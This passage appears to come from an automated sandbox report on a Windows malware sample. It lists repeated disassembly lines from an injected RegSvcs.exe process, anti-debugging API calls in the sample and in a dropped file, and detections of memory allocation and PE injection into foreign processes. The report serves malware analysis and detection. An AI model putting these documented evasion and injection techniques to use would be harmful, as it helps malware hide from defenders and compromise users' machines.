                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E627 mov eax, dword ptr fs:[00000030h]14_2_0143E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01456620 mov eax, dword ptr fs:[00000030h]14_2_01456620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01458620 mov eax, dword ptr fs:[00000030h]14_2_01458620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142262C mov eax, dword ptr fs:[00000030h]14_2_0142262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A6C7 mov ebx, dword ptr fs:[00000030h]14_2_0145A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A6C7 mov eax, dword ptr fs:[00000030h]14_2_0145A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E6F2 mov eax, dword ptr fs:[00000030h]14_2_0149E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E6F2 mov eax, dword ptr fs:[00000030h]14_2_0149E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E6F2 mov eax, dword ptr fs:[00000030h]14_2_0149E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E6F2 mov eax, dword ptr fs:[00000030h]14_2_0149E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A06F1 mov eax, dword ptr fs:[00000030h]14_2_014A06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A06F1 mov eax, dword ptr fs:[00000030h]14_2_014A06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424690 mov eax, dword ptr fs:[00000030h]14_2_01424690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424690 mov eax, dword ptr fs:[00000030h]14_2_01424690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C6A6 mov eax, dword ptr fs:[00000030h]14_2_0145C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014566B0 mov eax, dword ptr fs:[00000030h]14_2_014566B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A0946 mov eax, dword ptr fs:[00000030h]14_2_014A0946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4940 mov eax, dword ptr fs:[00000030h]14_2_014F4940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01446962 mov eax, dword ptr fs:[00000030h]14_2_01446962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01446962 mov eax, dword ptr fs:[00000030h]14_2_01446962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01446962 mov eax, dword ptr fs:[00000030h]14_2_01446962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0146096E mov eax, dword ptr fs:[00000030h]14_2_0146096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0146096E mov edx, dword ptr fs:[00000030h]14_2_0146096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0146096E mov eax, dword ptr fs:[00000030h]14_2_0146096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C4978 mov eax, dword ptr fs:[00000030h]14_2_014C4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C4978 mov eax, dword ptr fs:[00000030h]14_2_014C4978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AC97C mov eax, dword ptr fs:[00000030h]14_2_014AC97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E908 mov eax, dword ptr fs:[00000030h]14_2_0149E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E908 mov eax, dword ptr fs:[00000030h]14_2_0149E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AC912 mov eax, dword ptr fs:[00000030h]14_2_014AC912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418918 mov eax, dword ptr fs:[00000030h]14_2_01418918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418918 mov eax, dword ptr fs:[00000030h]14_2_01418918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A892A mov eax, dword ptr fs:[00000030h]14_2_014A892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B892B mov eax, dword ptr fs:[00000030h]14_2_014B892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B69C0 mov eax, dword ptr fs:[00000030h]14_2_014B69C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A9D0 mov eax, dword ptr fs:[00000030h]14_2_0142A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A9D0 mov eax, dword ptr fs:[00000030h]14_2_0142A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A9D0 mov eax, dword ptr fs:[00000030h]14_2_0142A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A9D0 mov eax, dword ptr fs:[00000030h]14_2_0142A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A9D0 mov eax, dword ptr fs:[00000030h]14_2_0142A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A9D0 mov eax, dword ptr fs:[00000030h]14_2_0142A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014549D0 mov eax, dword ptr fs:[00000030h]14_2_014549D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EA9D3 mov eax, dword ptr fs:[00000030h]14_2_014EA9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AE9E0 mov eax, dword ptr fs:[00000030h]14_2_014AE9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014529F9 mov eax, dword ptr fs:[00000030h]14_2_014529F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014529F9 mov eax, dword ptr fs:[00000030h]14_2_014529F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014329A0 mov eax, dword ptr fs:[00000030h]14_2_014329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014209AD mov eax, dword ptr fs:[00000030h]14_2_014209AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014209AD mov eax, dword ptr fs:[00000030h]14_2_014209AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A89B3 mov esi, dword ptr fs:[00000030h]14_2_014A89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A89B3 mov eax, dword ptr fs:[00000030h]14_2_014A89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A89B3 mov eax, dword ptr fs:[00000030h]14_2_014A89B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01432840 mov ecx, dword ptr fs:[00000030h]14_2_01432840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01450854 mov eax, dword ptr fs:[00000030h]14_2_01450854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424859 mov eax, dword ptr fs:[00000030h]14_2_01424859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01424859 mov eax, dword ptr fs:[00000030h]14_2_01424859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AE872 mov eax, dword ptr fs:[00000030h]14_2_014AE872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AE872 mov eax, dword ptr fs:[00000030h]14_2_014AE872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B6870 mov eax, dword ptr fs:[00000030h]14_2_014B6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B6870 mov eax, dword ptr fs:[00000030h]14_2_014B6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AC810 mov eax, dword ptr fs:[00000030h]14_2_014AC810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01442835 mov eax, dword ptr fs:[00000030h]14_2_01442835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01442835 mov eax, dword ptr fs:[00000030h]14_2_01442835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01442835 mov eax, dword ptr fs:[00000030h]14_2_01442835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01442835 mov ecx, dword ptr fs:[00000030h]14_2_01442835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01442835 mov eax, dword ptr fs:[00000030h]14_2_01442835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01442835 mov eax, dword ptr fs:[00000030h]14_2_01442835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A830 mov eax, dword ptr fs:[00000030h]14_2_0145A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C483A mov eax, dword ptr fs:[00000030h]14_2_014C483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C483A mov eax, dword ptr fs:[00000030h]14_2_014C483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144E8C0 mov eax, dword ptr fs:[00000030h]14_2_0144E8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F08C0 mov eax, dword ptr fs:[00000030h]14_2_014F08C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EA8E4 mov eax, dword ptr fs:[00000030h]14_2_014EA8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C8F9 mov eax, dword ptr fs:[00000030h]14_2_0145C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145C8F9 mov eax, dword ptr fs:[00000030h]14_2_0145C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420887 mov eax, dword ptr fs:[00000030h]14_2_01420887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014AC89D mov eax, dword ptr fs:[00000030h]14_2_014AC89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D4B4B mov eax, dword ptr fs:[00000030h]14_2_014D4B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D4B4B mov eax, dword ptr fs:[00000030h]14_2_014D4B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B6B40 mov eax, dword ptr fs:[00000030h]14_2_014B6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B6B40 mov eax, dword ptr fs:[00000030h]14_2_014B6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EAB40 mov eax, dword ptr fs:[00000030h]14_2_014EAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C8B42 mov eax, dword ptr fs:[00000030h]14_2_014C8B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418B50 mov eax, dword ptr fs:[00000030h]14_2_01418B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F2B57 mov eax, dword ptr fs:[00000030h]14_2_014F2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F2B57 mov eax, dword ptr fs:[00000030h]14_2_014F2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F2B57 mov eax, dword ptr fs:[00000030h]14_2_014F2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F2B57 mov eax, dword ptr fs:[00000030h]14_2_014F2B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CEB50 mov eax, dword ptr fs:[00000030h]14_2_014CEB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141CB7E mov eax, dword ptr fs:[00000030h]14_2_0141CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4B00 mov eax, dword ptr fs:[00000030h]14_2_014F4B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149EB1D mov eax, dword ptr fs:[00000030h]14_2_0149EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144EB20 mov eax, dword ptr fs:[00000030h]14_2_0144EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144EB20 mov eax, dword ptr fs:[00000030h]14_2_0144EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E8B28 mov eax, dword ptr fs:[00000030h]14_2_014E8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E8B28 mov eax, dword ptr fs:[00000030h]14_2_014E8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01440BCB mov eax, dword ptr fs:[00000030h]14_2_01440BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01440BCB mov eax, dword ptr fs:[00000030h]14_2_01440BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01440BCB mov eax, dword ptr fs:[00000030h]14_2_01440BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420BCD mov eax, dword ptr fs:[00000030h]14_2_01420BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420BCD mov eax, dword ptr fs:[00000030h]14_2_01420BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420BCD mov eax, dword ptr fs:[00000030h]14_2_01420BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CEBD0 mov eax, dword ptr fs:[00000030h]14_2_014CEBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01428BF0 mov eax, dword ptr fs:[00000030h]14_2_01428BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01428BF0 mov eax, dword ptr fs:[00000030h]14_2_01428BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01428BF0 mov eax, dword ptr fs:[00000030h]14_2_01428BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144EBFC mov eax, dword ptr fs:[00000030h]14_2_0144EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014ACBF0 mov eax, dword ptr fs:[00000030h]14_2_014ACBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430BBE mov eax, dword ptr fs:[00000030h]14_2_01430BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430BBE mov eax, dword ptr fs:[00000030h]14_2_01430BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D4BB0 mov eax, dword ptr fs:[00000030h]14_2_014D4BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014D4BB0 mov eax, dword ptr fs:[00000030h]14_2_014D4BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426A50 mov eax, dword ptr fs:[00000030h]14_2_01426A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426A50 mov eax, dword ptr fs:[00000030h]14_2_01426A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426A50 mov eax, dword ptr fs:[00000030h]14_2_01426A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426A50 mov eax, dword ptr fs:[00000030h]14_2_01426A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426A50 mov eax, dword ptr fs:[00000030h]14_2_01426A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426A50 mov eax, dword ptr fs:[00000030h]14_2_01426A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426A50 mov eax, dword ptr fs:[00000030h]14_2_01426A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430A5B mov eax, dword ptr fs:[00000030h]14_2_01430A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01430A5B mov eax, dword ptr fs:[00000030h]14_2_01430A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA6F mov eax, dword ptr fs:[00000030h]14_2_0145CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA6F mov eax, dword ptr fs:[00000030h]14_2_0145CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA6F mov eax, dword ptr fs:[00000030h]14_2_0145CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CEA60 mov eax, dword ptr fs:[00000030h]14_2_014CEA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149CA72 mov eax, dword ptr fs:[00000030h]14_2_0149CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149CA72 mov eax, dword ptr fs:[00000030h]14_2_0149CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014ACA11 mov eax, dword ptr fs:[00000030h]14_2_014ACA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA24 mov eax, dword ptr fs:[00000030h]14_2_0145CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144EA2E mov eax, dword ptr fs:[00000030h]14_2_0144EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01444A35 mov eax, dword ptr fs:[00000030h]14_2_01444A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01444A35 mov eax, dword ptr fs:[00000030h]14_2_01444A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145CA38 mov eax, dword ptr fs:[00000030h]14_2_0145CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01476ACC mov eax, dword ptr fs:[00000030h]14_2_01476ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01476ACC mov eax, dword ptr fs:[00000030h]14_2_01476ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01476ACC mov eax, dword ptr fs:[00000030h]14_2_01476ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01420AD0 mov eax, dword ptr fs:[00000030h]14_2_01420AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01454AD0 mov eax, dword ptr fs:[00000030h]14_2_01454AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01454AD0 mov eax, dword ptr fs:[00000030h]14_2_01454AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145AAEE mov eax, dword ptr fs:[00000030h]14_2_0145AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145AAEE mov eax, dword ptr fs:[00000030h]14_2_0145AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142EA80 mov eax, dword ptr fs:[00000030h]14_2_0142EA80
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CC2CE0 GetProcessHeap,0_2_00CC2CE0
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CB6878
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CBAAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBAAC4
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6A0B SetUnhandledExceptionFilter,0_2_00CB6A0B
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB5BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CB5BBF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EB29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00EB29B2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00EA0BCF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA0D65 SetUnhandledExceptionFilter,8_2_00EA0D65
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00EA0FB1

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
